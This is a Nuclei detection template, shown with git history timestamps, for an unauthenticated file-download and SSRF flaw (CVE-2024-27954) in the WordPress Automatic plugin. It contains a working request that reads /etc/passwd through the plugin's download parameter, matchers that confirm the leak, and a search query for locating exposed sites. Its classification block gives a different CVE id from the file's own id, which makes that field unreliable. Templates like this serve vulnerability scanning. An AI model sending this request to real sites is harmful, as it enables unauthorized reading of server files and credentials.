nuclei-templates/http/cves/2024/CVE-2024-27954.yaml

38 lines
1.5 KiB
YAML
Raw Normal View History

2024-03-22 15:33:04 +00:00
id: CVE-2024-27954
info:
2024-03-22 15:43:51 +00:00
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
2024-03-22 15:33:04 +00:00
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
2024-03-22 15:43:51 +00:00
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
2024-03-22 15:33:04 +00:00
reference:
2024-03-22 15:52:57 +00:00
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
2024-03-22 15:33:04 +00:00
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
2024-03-22 15:43:51 +00:00
classification:
2024-03-22 15:52:57 +00:00
cvss-score: 9.8
cve-id: CVE-2022-1970
cwe-id: CWE-918
2024-03-22 15:43:51 +00:00
metadata:
verified: true
max-request: 1
2024-03-22 15:52:57 +00:00
publicwww-query: "/wp-content/plugins/wp-automatic"
tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
2024-03-22 15:33:04 +00:00
http:
2024-03-22 15:52:57 +00:00
- method: GET
path:
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
2024-03-22 15:33:04 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"link":"file:'
2024-03-22 15:52:57 +00:00
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950